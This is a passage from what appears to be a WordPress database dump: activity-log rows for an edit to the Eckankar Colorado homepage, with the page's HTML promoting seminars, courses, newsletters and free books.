right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242834,41180,'_message_key','post_updated'),(242835,41180,'_user_id','2'),(242836,41180,'_user_login','S8zhaBda'),(242837,41180,'_user_email','nada@zipnadanot.org'),(242838,41180,'_server_remote_addr','76.130.120.x'),(242839,41180,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242840,41181,'post_id','7160'),(242841,41181,'post_type','page'),(242842,41181,'post_title','Home'),(242843,41181,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" 